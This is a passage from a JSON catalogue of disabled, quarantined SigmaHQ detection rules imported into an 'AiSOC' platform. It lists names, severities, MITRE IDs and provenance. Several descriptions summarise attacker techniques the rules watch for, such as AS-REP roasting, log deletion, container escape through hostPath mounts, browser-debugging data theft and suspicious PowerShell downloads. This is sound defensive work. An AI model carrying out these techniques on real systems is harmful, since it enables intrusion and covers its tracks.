], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/openssh-server-listening-on-socket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" } }, { "id": "sigmahq-sigma-3ceb2083-a27f-449a-be33-14ec1b7cc973", "type": "detection", "name": "Silence.EDA Detection", "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1071.004", "T1572", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/silence-eda-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" } }, { "id": "sigmahq-sigma-3d0ed417-3d94-4963-a562-4a92c940656a", "type": "detection", "name": "Creation of a Diagcab", "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-diagcab.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d0ed417-3d94-4963-a562-4a92c940656a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_diagcab.yml" } }, { "id": "sigmahq-sigma-3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "type": "detection", "name": "Office Application Startup - Office Test", "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-startup-office-test.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" } }, { "id": "sigmahq-sigma-3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "type": "detection", "name": "Publisher Attachment File Dropped In Suspicious Location", "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/publisher-attachment-file-dropped-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml" } }, { "id": "sigmahq-sigma-3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "type": "detection", "name": "Change Default File Association Via Assoc", "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-default-file-association-via-assoc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml" } }, { "id": "sigmahq-sigma-3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "type": "detection", "name": "Potential Mftrace.EXE Abuse", "description": "Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can abused to execute arbitrary binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mftrace-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml" } }, { "id": "sigmahq-sigma-3d7679bd-0c00-440c-97b0-3f204273e6c7", "type": "detection", "name": "New Process Created Via Taskmgr.EXE", "description": "Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-process-created-via-taskmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-3da70954-0f2c-4103-adff-b7440368f50e", "type": "detection", "name": "Suspicious PROCEXP152.sys File Created In TMP", "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-procexp152-sys-file-created-in-tmp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3da70954-0f2c-4103-adff-b7440368f50e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" } }, { "id": "sigmahq-sigma-3dfd06d2-eaf4-4532-9555-68aca59f57c4", "type": "detection", "name": "Process Execution From A Potentially Suspicious Folder", "description": "Detects a potentially suspicious execution from an uncommon folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-execution-from-a-potentially-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" } }, { "id": "sigmahq-sigma-3e102cd9-a70d-4a7a-9508-403963092f31", "type": "detection", "name": "Linux Network Service Scanning Tools Execution", "description": "Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-network-service-scanning-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e102cd9-a70d-4a7a-9508-403963092f31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml" } }, { "id": "sigmahq-sigma-3e2f1b2c-4d5e-11ee-be56-0242ac120002", "type": "detection", "name": "Potential AS-REP Roasting via Kerberos TGT Requests", "description": "Detects suspicious Kerberos TGT requests with pre-authentication disabled (Pre-Authentication Type = 0) and Ticket Encryption Type (0x17) i.e, RC4-HMAC.\nThis may indicate an AS-REP Roasting attack, where attackers request AS-REP messages for accounts without pre-authentication and attempt to crack the encrypted ticket offline to recover user passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-as-rep-roasting-via-kerberos-tgt-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e2f1b2c-4d5e-11ee-be56-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberos_asrep_roasting.yml" } }, { "id": "sigmahq-sigma-3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "type": "detection", "name": "Hardware Model Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hardware-model-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml" } }, { "id": "sigmahq-sigma-3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "type": "detection", "name": "Potential Data Stealing Via Chromium Headless Debugging", "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1185", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-stealing-via-chromium-headless-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" } }, { "id": "sigmahq-sigma-3eaf6218-3bed-4d8a-8707-274096f12a18", "type": "detection", "name": "Wannacry Killswitch Domain", "description": "Detects wannacry killswitch domain dns queries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wannacry-killswitch-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3eaf6218-3bed-4d8a-8707-274096f12a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_wannacry_killswitch_domain.yml" } }, { "id": "sigmahq-sigma-3eb8c339-a765-48cc-a150-4364c04652bf", "type": "detection", "name": "IIS WebServer Access Logs Deleted", "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-webserver-access-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3eb8c339-a765-48cc-a150-4364c04652bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml" } }, { "id": "sigmahq-sigma-3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "type": "detection", "name": "OpenCanary - MSSQL Login Attempt Via SQLAuth", "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mssql-login-attempt-via-sqlauth.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_mssql_login_sqlauth.yml" } }, { "id": "sigmahq-sigma-3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "type": "detection", "name": "Use NTFS Short Name in Image", "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-ntfs-short-name-in-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" } }, { "id": "sigmahq-sigma-3f0f5957-04f8-4792-ad89-192b0303bde6", "type": "detection", "name": "Python WebServer Execution - Linux", "description": "Detects the execution of Python web servers via command line interface (CLI).\nAfter gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.\nThis technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-webserver-execution-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f0f5957-04f8-4792-ad89-192b0303bde6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml" } }, { "id": "sigmahq-sigma-3f3f3506-1895-401b-9cc3-e86b16e630d0", "type": "detection", "name": "Potential Direct Syscall of NtOpenProcess", "description": "Detects potential calls to NtOpenProcess directly from NTDLL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-direct-syscall-of-ntopenprocess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml" } }, { "id": "sigmahq-sigma-3f5491e2-8db8-496b-9e95-1029fce852d4", "type": "detection", "name": "Driver/DLL Installation Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driver-dll-installation-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f5491e2-8db8-496b-9e95-1029fce852d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" } }, { "id": "sigmahq-sigma-3f6b7b62-61aa-45db-96bd-9c31b36b653c", "type": "detection", "name": "RDP Sensitive Settings Changed", "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n\nBelow is a list of registry keys/values that are monitored by this rule:\n\n- Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.\n- DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.\n- DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.\n- fAllowUnsolicited: Allows unsolicited remote assistance offers.\n- fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.\n- InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.\n- ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.\n- SecurityLayer: Specifies the security layer used for RDP connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-sensitive-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" } }, { "id": "sigmahq-sigma-3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "type": "detection", "name": "Syslog Clearing or Removal Via System Utilities", "description": "Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syslog-clearing-or-removal-via-system-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" } }, { "id": "sigmahq-sigma-3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "type": "detection", "name": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols", "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-zonemap-setting-downgraded-to-mycomputer-zone-for-http-protocols.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" } }, { "id": "sigmahq-sigma-3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "type": "detection", "name": "Certificate Exported Via Certutil.EXE", "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml" } }, { "id": "sigmahq-sigma-401e5d00-b944-11ea-8f9a-00163ecd60ae", "type": "detection", "name": "AppLocker Prevented Application or Script from Running", "description": "Detects when AppLocker prevents the execution of an Application, DLL, Script, MSI, or Packaged-App from running.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1059.001", "T1059.003", "T1059.005", "T1059.006", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/applocker-prevented-application-or-script-from-running.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/applocker/win_applocker_application_was_prevented_from_running.yml" } }, { "id": "sigmahq-sigma-402b955c-8fe0-4a8c-b635-622b4ac5f902", "type": "detection", "name": "Container With A hostPath Mount Created", "description": "Detects creation of a container with a hostPath mount.\nA hostPath volume mounts a directory or a file from the node to the container.\nAttackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/container-with-a-hostpath-mount-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "402b955c-8fe0-4a8c-b635-622b4ac5f902", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml" } }, { "id": "sigmahq-sigma-402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "type": "detection", "name": "Malicious ShellIntel PowerShell Commandlets", "description": "Detects Commandlet names from ShellIntel exploitation scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-shellintel-powershell-commandlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-403c2cc0-7f6b-4925-9423-bfa573bed7eb", "type": "detection", "name": "Suspicious PowerShell Download - Powershell Script", "description": "Detects suspicious PowerShell download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" } }, { "id": "sigmahq-sigma-403ed92c-b7ec-4edd-9947-5b535ee12d46", "type": "detection", "name": "Crontab Enumeration", "description": "Detects usage of crontab to list the tasks of the user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crontab-enumeration.yaml", 